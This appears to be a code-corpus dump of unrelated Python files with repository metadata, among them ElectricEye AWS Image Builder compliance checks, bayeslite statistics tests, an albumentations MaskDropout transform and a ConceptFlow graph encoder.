#This file is part of ElectricEye. #SPDX-License-Identifier: Apache-2.0 #Licensed to the Apache Software Foundation (ASF) under one #or more contributor license agreements. See the NOTICE file #distributed with this work for additional information #regarding copyright ownership. The ASF licenses this file #to you under the Apache License, Version 2.0 (the #"License"); you may not use this file except in compliance #with the License. You may obtain a copy of the License at #http://www.apache.org/licenses/LICENSE-2.0 #Unless required by applicable law or agreed to in writing, #software distributed under the License is distributed on an #"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY #KIND, either express or implied. See the License for the #specific language governing permissions and limitations #under the License. import boto3 import datetime import json from check_register import CheckRegister registry = CheckRegister() imagebuilder = boto3.client("imagebuilder") @registry.register_check("imagebuilder") def imagebuilder_pipeline_tests_enabled_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict: """[ImageBuilder.1] Image pipeline tests should be enabled""" pipelines = imagebuilder.list_image_pipelines() pipeline_list = pipelines["imagePipelineList"] iso8601Time = datetime.datetime.now(datetime.timezone.utc).isoformat() for arn in pipeline_list: pipelineArn = arn["arn"] pipeline_name = arn["name"] image_pipelines = imagebuilder.get_image_pipeline(imagePipelineArn=pipelineArn) image_test_config = image_pipelines["imagePipeline"]["imageTestsConfiguration"] image_test_enabled = image_test_config["imageTestsEnabled"] if image_test_enabled == True: finding = { "SchemaVersion": "2018-10-08", "Id": pipelineArn + "/imagebuilder-pipeline-tests-enabled-check", "ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default", "GeneratorId": pipelineArn, "AwsAccountId": awsAccountId, "Types": [ "Software and Configuration Checks/AWS Security Best Practices", "Effects/Data Exposure", ], "FirstObservedAt": iso8601Time, "CreatedAt": iso8601Time, "UpdatedAt": iso8601Time, "Severity": {"Label": "INFORMATIONAL"}, "Confidence": 99, "Title": "[ImageBuilder.1] Image pipeline tests should be enabled", "Description": "Image pipeline " + pipeline_name + " has tests enabled.", "Remediation": { "Recommendation": { "Text": "For more information on EC2 Image Builder Security and enabling image testing refer to the Best Practices section of the Amazon EC2 Image Builder Developer Guide.", "Url": "https://docs.aws.amazon.com/imagebuilder/latest/userguide/security-best-practices.html", } }, "ProductFields": {"Product Name": "ElectricEye"}, "Resources": [ { "Type": "AwsImageBuilderPipeline", "Id": pipelineArn, "Partition": awsPartition, "Region": awsRegion, "Details": {"AwsImageBuilderPipeline": {"PipelineName": pipeline_name}}, } ], "Compliance": { "Status": "PASSED", "RelatedRequirements": [ "NIST CSF ID.AM-2", "NIST SP 800-53 CM-8", "NIST SP 800-53 PM-5", "AICPA TSC CC3.2", "AICPA TSC CC6.1", "ISO 27001:2013 A.8.1.1", "ISO 27001:2013 A.8.1.2", "ISO 27001:2013 A.12.5.1", ], }, "Workflow": {"Status": "RESOLVED"}, "RecordState": "ARCHIVED", } yield finding else: finding = { "SchemaVersion": "2018-10-08", "Id": pipelineArn + "/imagebuilder-pipeline-tests-enabled-check", "ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default", "GeneratorId": pipelineArn, "AwsAccountId": awsAccountId, "Types": [ "Software and Configuration Checks/AWS Security Best Practices", "Effects/Data Exposure", ], "FirstObservedAt": iso8601Time, "CreatedAt": iso8601Time, "UpdatedAt": iso8601Time, "Severity": {"Label": "MEDIUM"}, "Confidence": 99, "Title": "[ImageBuilder.1] Image pipeline tests should be enabled", "Description": "Image pipeline " + pipeline_name + " does not have tests enabled.", "Remediation": { "Recommendation": { "Text": "For more information on EC2 Image Builder Security and enabling image testing refer to the Best Practices section of the Amazon EC2 Image Builder Developer Guide.", "Url": "https://docs.aws.amazon.com/imagebuilder/latest/userguide/security-best-practices.html", } }, "ProductFields": {"Product Name": "ElectricEye"}, "Resources": [ { "Type": "AwsImageBuilderPipeline", "Id": pipelineArn, "Partition": awsPartition, "Region": awsRegion, "Details": {"AwsImageBuilderPipeline": {"PipelineName": pipeline_name}}, } ], "Compliance": { "Status": "FAILED", "RelatedRequirements": [ "NIST CSF ID.AM-2", "NIST SP 800-53 CM-8", "NIST SP 800-53 PM-5", "AICPA TSC CC3.2", "AICPA TSC CC6.1", "ISO 27001:2013 A.8.1.1", "ISO 27001:2013 A.8.1.2", "ISO 27001:2013 A.12.5.1", ], }, "Workflow": {"Status": "NEW"}, "RecordState": "ACTIVE", } yield finding @registry.register_check("imagebuilder") def imagebuilder_ebs_encryption_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict: """[ImageBuilder.2] Image recipes should encrypt EBS volumes""" recipes = imagebuilder.list_image_recipes() recipes_list = recipes["imageRecipeSummaryList"] iso8601Time = datetime.datetime.now(datetime.timezone.utc).isoformat() for details in recipes_list: recipeArn = details["arn"] recipe_name = details["name"] recipe = imagebuilder.get_image_recipe(imageRecipeArn=recipeArn) device_mapping = recipe["imageRecipe"]["blockDeviceMappings"] list1 = device_mapping[0] ebs = list1["ebs"] ebs_encryption = ebs["encrypted"] if ebs_encryption == True: finding = { "SchemaVersion": "2018-10-08", "Id": recipeArn + "/imagebuilder-ebs-encryption-check", "ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default", "GeneratorId": recipeArn, "AwsAccountId": awsAccountId, "Types": [ "Software and Configuration Checks/AWS Security Best Practices", "Effects/Data Exposure", ], "FirstObservedAt": iso8601Time, "CreatedAt": iso8601Time, "UpdatedAt": iso8601Time, "Severity": {"Label": "INFORMATIONAL"}, "Confidence": 99, "Title": "[ImageBuilder.2] Image recipes should encrypt EBS volumes", "Description": "Image recipe " + recipe_name + " has EBS encrypted.", "Remediation": { "Recommendation": { "Text": "For more information on EC2 Image Builder Security and EBS encyption refer to the How EC2 Image Builder Works section of the Amazon EC2 Image Builder Developer Guide.", "Url": "https://docs.aws.amazon.com/imagebuilder/latest/userguide/how-image-builder-works.html#image-builder-components", } }, "ProductFields": {"Product Name": "ElectricEye"}, "Resources": [ { "Type": "AwsImageBuilderRecipe", "Id": recipeArn, "Partition": awsPartition, "Region": awsRegion, "Details": {"AwsImageBuilderRecipe": {"RecipeName": recipe_name}}, } ], "Compliance": { "Status": "PASSED", "RelatedRequirements": [ "NIST CSF ID.AM-2", "NIST SP 800-53 CM-8", "NIST SP 800-53 PM-5", "AICPA TSC CC3.2", "AICPA TSC CC6.1", "ISO 27001:2013 A.8.1.1", "ISO 27001:2013 A.8.1.2", "ISO 27001:2013 A.12.5.1", ], }, "Workflow": {"Status": "RESOLVED"}, "RecordState": "ARCHIVED", } yield finding else: finding = { "SchemaVersion": "2018-10-08", "Id": recipeArn + "/imagebuilder-ebs-encryption-check", "ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default", "GeneratorId": recipeArn, "AwsAccountId": awsAccountId, "Types": [ "Software and Configuration Checks/AWS Security Best Practices", "Effects/Data Exposure", ], "FirstObservedAt": iso8601Time, "CreatedAt": iso8601Time, "UpdatedAt": iso8601Time, "Severity": {"Label": "MEDIUM"}, "Confidence": 99, "Title": "[ImageBuilder.2] Image recipes should encrypt EBS volumes", "Description": "Image recipe " + recipe_name + " does not have EBS encrypted.", "Remediation": { "Recommendation": { "Text": "For more information on EC2 Image Builder Security and EBS encyption refer to the How EC2 Image Builder Works section of the Amazon EC2 Image Builder Developer Guide.", "Url": "https://docs.aws.amazon.com/imagebuilder/latest/userguide/how-image-builder-works.html#image-builder-components", } }, "ProductFields": {"Product Name": "ElectricEye"}, "Resources": [ { "Type": "AwsImageBuilderRecipe", "Id": recipeArn, "Partition": awsPartition, "Region": awsRegion, "Details": {"AwsImageBuilderRecipe": {"RecipeName": recipe_name}}, } ], "Compliance": { "Status": "FAILED", "RelatedRequirements": [ "NIST CSF ID.AM-2", "NIST SP 800-53 CM-8", "NIST SP 800-53 PM-5", "AICPA TSC CC3.2", "AICPA TSC CC6.1", "ISO 27001:2013 A.8.1.1", "ISO 27001:2013 A.8.1.2", "ISO 27001:2013 A.12.5.1", ], }, "Workflow": {"Status": "NEW"}, "RecordState": "ACTIVE", } yield finding
examples/brtdp_example.py
david-abel/mdps
230
12728315
# Python imports. from collections import defaultdict import copy # Other imports. from simple_rl.planning import Planner from simple_rl.planning import ValueIteration from simple_rl.tasks import GridWorldMDP from simple_rl.planning.BoundedRTDPClass import BoundedRTDP class MonotoneLowerBound(Planner): def __init__(self, mdp, name='MonotoneUpperBound'): relaxed_mdp = MonotoneLowerBound._construct_deterministic_relaxation_mdp(mdp) Planner.__init__(self, relaxed_mdp, name) self.vi = ValueIteration(relaxed_mdp) self.states = self.vi.get_states() self.vi._compute_matrix_from_trans_func() self.vi.run_vi() self.lower_values = self._construct_lower_values() @staticmethod def _construct_deterministic_relaxation_mdp(mdp): relaxed_mdp = copy.deepcopy(mdp) relaxed_mdp.set_slip_prob(0.0) return relaxed_mdp def _construct_lower_values(self): values = defaultdict() for state in self.states: values[state] = self.vi.get_value(state) return values class MonotoneUpperBound(Planner): def __init__(self, mdp, name='MonotoneUpperBound'): Planner.__init__(self, mdp, name) self.vi = ValueIteration(mdp) self.states = self.vi.get_states() self.upper_values = self._construct_upper_values() def _construct_upper_values(self): values = defaultdict() for state in self.states: values[state] = 1. / (1. - self.gamma) return values def main(): test_mdp = GridWorldMDP(width=6, height=6, goal_locs=[(6, 6)], slip_prob=0.2) lower_value_function = MonotoneLowerBound(test_mdp).lower_values upper_value_function = MonotoneUpperBound(test_mdp).upper_values bounded_rtdp = BoundedRTDP(test_mdp, lower_values_init=lower_value_function, upper_values_init=upper_value_function) test_policy = bounded_rtdp.plan() print('Derived policy:\n{}'.format(test_policy)) if __name__ == '__main__': main()
tests/test_provider_circonus_labs_circonus.py
mjuenema/python-terrascript
507
12728316
<reponame>mjuenema/python-terrascript # tests/test_provider_circonus-labs_circonus.py # Automatically generated by tools/makecode.py (24-Sep-2021 15:13:59 UTC) def test_provider_import(): import terrascript.provider.circonus_labs.circonus def test_resource_import(): from terrascript.resource.circonus_labs.circonus import circonus_check from terrascript.resource.circonus_labs.circonus import circonus_contact_group from terrascript.resource.circonus_labs.circonus import circonus_dashboard from terrascript.resource.circonus_labs.circonus import circonus_graph from terrascript.resource.circonus_labs.circonus import circonus_maintenance from terrascript.resource.circonus_labs.circonus import circonus_metric from terrascript.resource.circonus_labs.circonus import circonus_overlay_set from terrascript.resource.circonus_labs.circonus import circonus_rule_set from terrascript.resource.circonus_labs.circonus import circonus_rule_set_group from terrascript.resource.circonus_labs.circonus import circonus_worksheet def test_datasource_import(): from terrascript.data.circonus_labs.circonus import circonus_account from terrascript.data.circonus_labs.circonus import circonus_collector # TODO: Shortcut imports without namespace for official and supported providers. # TODO: This has to be moved into a required_providers block. # def test_version_source(): # # import terrascript.provider.circonus_labs.circonus # # t = terrascript.provider.circonus_labs.circonus.circonus() # s = str(t) # # assert 'https://github.com/circonus-labs/terraform-provider-circonus' in s # assert '0.12.2' in s
colorsublime/commands.py
adrianebohrer/Colorsublime-Plugin
495
12728318
""" Collection of functions the plugin can invoke. Most if not all should be non-blocking (@async) functions to keep the main UI thread from freezing. These functions should catch all unexpected exceptions so the plugin does not have to. Unexpected exceptions should return False. Expected exceptions should be caught by other modules this module uses. Log all unusual behavior. All @async functions have an optional callback parameter as the last argument. """ import os from . import logger from . import settings from . import http from . import io from .async import async from .theme import Theme log = logger.get(__name__) def get_current_theme(): return settings.get_current_theme() def get_installed_themes(): theme_filenames = os.listdir(settings.install_path()) themes = [] for t in theme_filenames: if t.endswith('.tmTheme'): name = t.replace('.tmTheme', '') themes.append(Theme(name=name, file_name=t)) themes.sort() return themes @async def fetch_repo(): """ Get current theme archive in a new thread """ archive = http.get(settings.repo_url()) io.extract(archive, settings.cache_path()) themes_list = io.read_json(settings.themes_list_path()) themes = [Theme.from_json(theme) for theme in themes_list] themes = {t.name: t for t in themes} return themes def _exists(theme): if not os.path.exists(theme.cache_path.abs): log.error('Path %s not found!', theme.cache_path.abs) return False return True def preview_theme(theme): log.debug('Previewing theme %s at %s', theme.name, theme.cache_path.abs) if not _exists(theme): return settings.set_theme(theme.cache_path.rel) def install_theme(theme): log.debug('Installing theme %s to %s', theme.name, theme.install_path.abs) if not _exists(theme): return io.copy(theme.cache_path.abs, theme.install_path.abs) settings.set_theme(theme.install_path.rel) settings.commit() def revert_theme(path): log.debug('Reverting theme at path %s', path) settings.set_theme(path) def uninstall_theme(theme): os.remove(theme.install_path.abs)
src/textual/views/_grid_view.py
dpoehls/textual
6,706
12728326
from ..view import View from ..layouts.grid import GridLayout class GridView(View, layout=GridLayout): @property def grid(self) -> GridLayout: assert isinstance(self.layout, GridLayout) return self.layout
notebooks/exercise_solutions/n03_kinematics_define-frame.py
pydy/pydy-tutorial-human-standing
134
12728338
upper_leg_frame = ReferenceFrame('U') torso_frame = ReferenceFrame('T')
tests/test_stats.py
almartin82/bayeslite
964
12728355
# -*- coding: utf-8 -*- # Copyright (c) 2010-2016, MIT Probabilistic Computing Project # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import math import pytest import bayeslite.stats as stats from bayeslite.math_util import relerr def abserr(expected, actual): """Computes the absolute error between `expected` and `actual`. :param float expected: The expected value. :param float actual: The actual value. :return: ``abs(actual-expected)`` :rtype: float """ return abs(actual - expected) def test_pearsonr(): assert math.isnan(stats.pearsonr([], [])) assert stats.pearsonr([1,2,3], [2,4,6]) == +1.0 assert stats.pearsonr([1,2,3], [-2,-4,-6]) == -1.0 assert stats.pearsonr([1,2,3], [6,4,2]) == -1.0 assert stats.pearsonr([1,2,3], [+1,-1,+1]) == 0.0 def test_chi2_contingency(): assert stats.chi2_contingency([[42]]) == 0. assert relerr(7.66, stats.chi2_contingency([[4,2,3], [3,16,2]])) < 0.01 def test_f_oneway(): data = [[6,8,4,5,3,4], [8,12,9,11,6,8], [13,9,11,8,7,12]] assert relerr(9.3, stats.f_oneway(data)) < 0.01 def test_chi2_sf(): # Non-positive degrees of freedom should throw an error. with pytest.raises(ValueError): stats.chi2_sf(0, 0) with pytest.raises(ValueError): stats.chi2_sf(2, -10) # Survival of x = 0 should be 1. assert relerr(1., stats.chi2_sf(0,12)) < .05 assert relerr(1., stats.chi2_sf(0,6)) < .05 assert relerr(1., stats.chi2_sf(0,130)) < .05 # Test x < 1, x >= df against reference values. assert relerr(.0357175, stats.chi2_sf(.8,.1)) < .05 assert relerr(.2730426, stats.chi2_sf(.6,.6)) < .05 assert relerr(.0602823, stats.chi2_sf(.1,.05)) < .05 # Test x >= 1, x <= df against reference values. assert relerr(.7029304, stats.chi2_sf(9,12)) < .05 assert relerr(.5934191, stats.chi2_sf(1.9,3)) < .05 assert relerr(.9238371, stats.chi2_sf(1,4.2)) < .05 # Test x >= 1, x > df against reference values. assert relerr(.3325939, stats.chi2_sf(8,7)) < .05 assert relerr(.0482861, stats.chi2_sf(3.9,1)) < .05 assert relerr(.3464377e-4, stats.chi2_sf(193,121)) < .05 def test_f_sf(): # Non-positive degrees of freedom should throw an error. with pytest.raises(ValueError): stats.f_sf(0,0,0) with pytest.raises(ValueError): stats.f_sf(2,-10,0) with pytest.raises(ValueError): stats.f_sf(2,0,-10) with pytest.raises(ValueError): stats.f_sf(2,-1,1) with pytest.raises(ValueError): stats.f_sf(2,1,-1) # Survival of x = 0 should be 1. assert relerr(1, stats.f_sf(0,1,12)) < .05 assert relerr(1, stats.f_sf(0,6,0.5)) < .05 assert relerr(1, stats.f_sf(0,130,121)) < .05 # Survival of x < 0 should be 1. assert relerr(1, stats.f_sf(-1,1,12)) < .05 assert relerr(1, stats.f_sf(-100,6,0.5)) < .05 assert relerr(1, stats.f_sf(-0.02,130,121)) < .05 # Test against reference values. assert relerr(.5173903, stats.f_sf(1,12,8)) < .05 assert relerr(.2618860, stats.f_sf(1.9,1,3)) < .05 assert relerr(.5000000, stats.f_sf(1,100,100)) < .05 assert relerr(.1781364, stats.f_sf(19,14,1)) < .05 assert relerr(.7306588, stats.f_sf(0.76,23,15)) < .05 assert relerr(.0602978, stats.f_sf(4.3,1,12)) < .05 assert relerr(.5590169, stats.f_sf(1.1,2,1)) < .05 assert relerr(.1111111, stats.f_sf(8,2,2)) < .05 assert relerr(.9999999, stats.f_sf(0.2,432,123)) < .05 assert relerr(.9452528, stats.f_sf(0.8,432,123)) < .05 assert relerr(.0434186, stats.f_sf(10,5,3)) < .05 # Test against reference very close to zero. assert abserr(.0158130, stats.f_sf(11,19,4)) < .01 assert abserr(.0022310, stats.f_sf(14,9,6)) < .01 assert abserr(.1458691e-112, stats.f_sf(200,432,123)) < .01 assert abserr(.2489256e-13, stats.f_sf(29,23,29)) < .01 assert abserr(.1656276e-06, stats.f_sf(31,11,13)) < .01 assert abserr(.6424023e-5, stats.f_sf(18,14,12)) < .01 def test_t_cdf(): # Non-positive degrees of freedom should throw an error. with pytest.raises(ValueError): stats.t_cdf(0,0) with pytest.raises(ValueError): stats.t_cdf(2,-10) # CDF of x = 0 should be 0.5. assert relerr(.5, stats.t_cdf(0,12)) < .01 assert relerr(.5, stats.t_cdf(0,6)) < .01 assert relerr(.5, stats.t_cdf(0,130)) < .01 # Test against various reference values. assert relerr(.57484842931039226, stats.t_cdf(.8, .1)) < .05 assert relerr(.64922051214061649, stats.t_cdf(.6, .6)) < .05 assert relerr(.51046281131211058, stats.t_cdf(.1, .05)) < .05 assert relerr(.99999944795492968, stats.t_cdf(9, 12)) < .05 assert relerr(.92318422834700042, stats.t_cdf(1.9, 3)) < .05 assert relerr(.81430689864299455, stats.t_cdf(1, 4.2)) < .05 assert relerr(.99995442539414559, stats.t_cdf(8, 7)) < .05 assert relerr(.92010336338282994, stats.t_cdf(3.9, 1)) < .05 assert relerr(1.0, stats.t_cdf(193, 121)) < .05 assert relerr(.42515157068960779, stats.t_cdf(-.8, .1)) < .05 assert relerr(.35077948785938345, stats.t_cdf(-.6, .6)) < .05 assert relerr(.48953718868788948, stats.t_cdf(-.1, .05)) < .05 assert relerr(.076815771652999562, stats.t_cdf(-1.9, 3)) < .05 assert relerr(.18569310135700545, stats.t_cdf(-1, 4.2)) < .05 assert relerr(.17530833141010374, stats.t_cdf(-1, 7)) < .05 assert relerr(.079896636617170003, stats.t_cdf(-3.9, 1)) < .05 assert relerr(.30899158341328747, stats.t_cdf(-0.5, 121)) < .05 # Test against reference very close to zero. # XXX Why are we testing chi2_sf here? assert relerr(.346437e-4, stats.chi2_sf(193,121)) < .01 def test_gauss_suff_stats(): # High mean, tiny variance would lead to catastrophic cancellation # in a naive implementation that maintained the sum of squares. big = 400 small = 0.0000001 data = [big - small, big, big + small] true_sigma = math.sqrt(2 * small**2 / 3) (ct, mean, sigma) = stats.gauss_suff_stats(data) assert ct == 3 assert mean == big assert relerr(true_sigma, sigma) < 1e-5
jesse/strategies/Test38/__init__.py
noenfugler/jesse
3,999
12728373
from jesse.strategies import Strategy # test_average_take_profit_exception class Test38(Strategy): def should_long(self) -> bool: return self.index == 0 def should_short(self) -> bool: return False def go_long(self): qty = 1 self.buy = qty, 2 self.stop_loss = qty, 1 def go_short(self): pass def should_cancel(self): return False def filters(self): return [self.filter_1] def filter_1(self): # trying to access average_take_profit without setting it first return self.average_take_profit > 1
albumentations/augmentations/dropout/mask_dropout.py
Multihuntr/albumentations
3,893
12728403
import random from typing import Union, Tuple, Any, Dict import cv2 import numpy as np from skimage.measure import label from ...core.transforms_interface import DualTransform from ...core.transforms_interface import to_tuple __all__ = ["MaskDropout"] class MaskDropout(DualTransform): """ Image & mask augmentation that zero out mask and image regions corresponding to randomly chosen object instance from mask. Mask must be single-channel image, zero values treated as background. Image can be any number of channels. Inspired by https://www.kaggle.com/c/severstal-steel-defect-detection/discussion/114254 Args: max_objects: Maximum number of labels that can be zeroed out. Can be tuple, in this case it's [min, max] image_fill_value: Fill value to use when filling image. Can be 'inpaint' to apply inpaining (works only for 3-chahnel images) mask_fill_value: Fill value to use when filling mask. Targets: image, mask Image types: uint8, float32 """ def __init__( self, max_objects: int = 1, image_fill_value: Union[int, float, str] = 0, mask_fill_value: Union[int, float] = 0, always_apply: bool = False, p: float = 0.5, ): super(MaskDropout, self).__init__(always_apply, p) self.max_objects = to_tuple(max_objects, 1) self.image_fill_value = image_fill_value self.mask_fill_value = mask_fill_value @property def targets_as_params(self): return ["mask"] def get_params_dependent_on_targets(self, params) -> Dict[str, Any]: mask = params["mask"] label_image, num_labels = label(mask, return_num=True) if num_labels == 0: dropout_mask = None else: objects_to_drop = random.randint(self.max_objects[0], self.max_objects[1]) objects_to_drop = min(num_labels, objects_to_drop) if objects_to_drop == num_labels: dropout_mask = mask > 0 else: labels_index = random.sample(range(1, num_labels + 1), objects_to_drop) dropout_mask = np.zeros((mask.shape[0], mask.shape[1]), dtype=bool) for label_index in labels_index: dropout_mask |= label_image == label_index params.update({"dropout_mask": dropout_mask}) return params def apply(self, img: np.ndarray, dropout_mask: np.ndarray = None, **params) -> np.ndarray: if dropout_mask is None: return img if self.image_fill_value == "inpaint": dropout_mask = dropout_mask.astype(np.uint8) _, _, w, h = cv2.boundingRect(dropout_mask) radius = min(3, max(w, h) // 2) img = cv2.inpaint(img, dropout_mask, radius, cv2.INPAINT_NS) else: img = img.copy() img[dropout_mask] = self.image_fill_value return img def apply_to_mask(self, img: np.ndarray, dropout_mask: np.ndarray = None, **params) -> np.ndarray: if dropout_mask is None: return img img = img.copy() img[dropout_mask] = self.mask_fill_value return img def get_transform_init_args_names(self) -> Tuple[str, ...]: return "max_objects", "image_fill_value", "mask_fill_value"
model/central.py
Misterion777/ConceptFlow
107
12728432
<filename>model/central.py #coding:utf-8 import torch import numpy as np from torch.autograd import Variable import torch.nn as nn from torch.nn import utils as nn_utils from .embedding import WordEmbedding, EntityEmbedding, use_cuda, VERY_SMALL_NUMBER, VERY_NEG_NUMBER class CentralEncoder(nn.Module): def __init__(self, config, gnn_layers, embed_units, trans_units, word_embedding, entity_embedding): super(CentralEncoder, self).__init__() self.k = 2 + 1 self.gnn_layers = gnn_layers self.WordEmbedding = word_embedding self.EntityEmbedding = entity_embedding self.embed_units = embed_units self.trans_units = trans_units self.pagerank_lambda = config.pagerank_lambda self.fact_scale = config.fact_scale self.node_encoder = nn.LSTM(input_size = self.embed_units, hidden_size = self.trans_units, batch_first=True, bidirectional=False) self.lstm_drop = nn.Dropout(p = config.lstm_dropout) self.softmax_d1 = nn.Softmax(dim = 1) self.linear_drop = nn.Dropout(p = config.linear_dropout) self.relu = nn.ReLU() for i in range(self.gnn_layers): self.add_module('q2e_linear' + str(i), nn.Linear(in_features=self.trans_units, out_features=self.trans_units)) self.add_module('d2e_linear' + str(i), nn.Linear(in_features=self.trans_units, out_features=self.trans_units)) self.add_module('e2q_linear' + str(i), nn.Linear(in_features=self.k * self.trans_units, out_features=self.trans_units)) self.add_module('e2d_linear' + str(i), nn.Linear(in_features=self.k * self.trans_units, out_features=self.trans_units)) self.add_module('e2e_linear' + str(i), nn.Linear(in_features=self.k * self.trans_units, out_features=self.trans_units)) #use kb self.add_module('kb_head_linear' + str(i), nn.Linear(in_features=self.trans_units, out_features=self.trans_units)) self.add_module('kb_tail_linear' + str(i), nn.Linear(in_features=self.trans_units, out_features=self.trans_units)) self.add_module('kb_self_linear' + str(i), nn.Linear(in_features=self.trans_units, out_features=self.trans_units)) def forward(self, batch_size, max_local_entity, max_fact, query_text, local_entity, q2e_adj_mat, kb_adj_mat, kb_fact_rel, query_mask): # normalized adj matrix pagerank_f = use_cuda(Variable(torch.from_numpy(q2e_adj_mat).type('torch.FloatTensor'), requires_grad=True)) q2e_adj_mat = use_cuda(Variable(torch.from_numpy(q2e_adj_mat).type('torch.FloatTensor'), requires_grad=False)) assert pagerank_f.requires_grad == True # encode query query_word_emb = self.WordEmbedding(query_text) query_hidden_emb, (query_node_emb, _) = self.node_encoder(self.lstm_drop(query_word_emb), self.init_hidden(1, batch_size, self.trans_units)) query_node_emb = query_node_emb.squeeze(dim=0).unsqueeze(dim=1) query_rel_emb = query_node_emb # build kb_adj_matrix from sparse matrix (e2f_batch, e2f_f, e2f_e, e2f_val), (f2e_batch, f2e_e, f2e_f, f2e_val) = kb_adj_mat entity2fact_index = torch.LongTensor([e2f_batch, e2f_f, e2f_e]) entity2fact_val = torch.FloatTensor(e2f_val) entity2fact_mat = use_cuda(torch.sparse.FloatTensor(entity2fact_index, entity2fact_val, torch.Size([batch_size, max_fact, max_local_entity]))) fact2entity_index = torch.LongTensor([f2e_batch, f2e_e, f2e_f]) fact2entity_val = torch.FloatTensor(f2e_val) fact2entity_mat = use_cuda(torch.sparse.FloatTensor(fact2entity_index, fact2entity_val, torch.Size([batch_size, max_local_entity, max_fact]))) local_fact_emb = self.EntityEmbedding(kb_fact_rel) # attention fact2question div = float(np.sqrt(self.trans_units)) fact2query_sim = torch.bmm(query_hidden_emb, local_fact_emb.transpose(1, 2)) / div fact2query_sim = self.softmax_d1(fact2query_sim + (1 - query_mask.unsqueeze(dim=2)) * VERY_NEG_NUMBER) fact2query_att = torch.sum(fact2query_sim.unsqueeze(dim=3) * query_hidden_emb.unsqueeze(dim=2), dim=1) W = torch.sum(fact2query_att * local_fact_emb, dim=2) / div W_max = torch.max(W, dim=1, keepdim=True)[0] W_tilde = torch.exp(W - W_max) e2f_softmax = self.sparse_bmm(entity2fact_mat.transpose(1, 2), W_tilde.unsqueeze(dim=2)).squeeze(dim=2) e2f_softmax = torch.clamp(e2f_softmax, min=VERY_SMALL_NUMBER) e2f_out_dim = use_cuda(Variable(torch.sum(entity2fact_mat.to_dense(), dim=1), requires_grad=False)) # load entity embedding local_entity_emb = self.EntityEmbedding(local_entity) # label propagation on entities for i in range(self.gnn_layers): # get linear transformation functions for each layer q2e_linear = getattr(self, 'q2e_linear' + str(i)) d2e_linear = getattr(self, 'd2e_linear' + str(i)) e2q_linear = getattr(self, 'e2q_linear' + str(i)) e2d_linear = getattr(self, 'e2d_linear' + str(i)) e2e_linear = getattr(self, 'e2e_linear' + str(i)) kb_self_linear = getattr(self, 'kb_self_linear' + str(i)) kb_head_linear = getattr(self, 'kb_head_linear' + str(i)) kb_tail_linear = getattr(self, 'kb_tail_linear' + str(i)) # start propagation next_local_entity_emb = local_entity_emb # STEP 1: propagate from question, documents, and facts to entities # question -> entity q2e_emb = q2e_linear(self.linear_drop(query_node_emb)).expand(batch_size, max_local_entity, self.trans_units) next_local_entity_emb = torch.cat((next_local_entity_emb, q2e_emb), dim=2) # fact -> entity e2f_emb = self.relu(kb_self_linear(local_fact_emb) + self.sparse_bmm(entity2fact_mat, kb_head_linear(self.linear_drop(local_entity_emb)))) e2f_softmax_normalized = W_tilde.unsqueeze(dim=2) * self.sparse_bmm(entity2fact_mat, (pagerank_f / e2f_softmax).unsqueeze(dim=2)) e2f_emb = e2f_emb * e2f_softmax_normalized f2e_emb = self.relu(kb_self_linear(local_entity_emb) + self.sparse_bmm(fact2entity_mat, kb_tail_linear(self.linear_drop(e2f_emb)))) pagerank_f = self.pagerank_lambda * self.sparse_bmm(fact2entity_mat, e2f_softmax_normalized).squeeze(dim=2) + (1 - self.pagerank_lambda) * pagerank_f # STEP 2: combine embeddings from fact next_local_entity_emb = torch.cat((next_local_entity_emb, self.fact_scale * f2e_emb), dim=2) # STEP 3: propagate from entities to update question, documents, and facts # entity -> query query_node_emb = torch.bmm(pagerank_f.unsqueeze(dim=1), e2q_linear(self.linear_drop(next_local_entity_emb))) # update entity local_entity_emb = self.relu(e2e_linear(self.linear_drop(next_local_entity_emb))) return local_entity_emb def init_hidden(self, num_layer, batch_size, hidden_size): return (use_cuda(Variable(torch.zeros(num_layer, batch_size, hidden_size))), use_cuda(Variable(torch.zeros(num_layer, batch_size, hidden_size)))) def sparse_bmm(self, X, Y): """Batch multiply X and Y where X is sparse, Y is dense. Args: X: Sparse tensor of size BxMxN. Consists of two tensors, I:3xZ indices, and V:1xZ values. Y: Dense tensor of size BxNxK. Returns: batched-matmul(X, Y): BxMxK """ class LeftMMFixed(torch.autograd.Function): """ Implementation of matrix multiplication of a Sparse Variable with a Dense Variable, returning a Dense one. This is added because there's no autograd for sparse yet. No gradient computed on the sparse weights. """ @staticmethod def forward(ctx, sparse_weights, x): ctx.sparse_weights = sparse_weights return torch.mm(ctx.sparse_weights, x) @staticmethod def backward(ctx, grad_output): sparse_weights = ctx.sparse_weights return None, torch.mm(sparse_weights.t(), grad_output) I = X._indices() V = X._values() B, M, N = X.size() _, _, K = Y.size() Z = I.size()[1] lookup = Y[I[0, :], I[2, :], :] X_I = torch.stack((I[0, :] * M + I[1, :], use_cuda(torch.arange(Z).type(torch.LongTensor))), 0) S = use_cuda(Variable(torch.sparse.FloatTensor(X_I, V, torch.Size([B * M, Z])), requires_grad=False)) prod = LeftMMFixed.apply(S, lookup) return prod.view(B, M, K)
AotSharedCacheExtractor/main.py
FFRI/ProjectChampollion
172
12728450
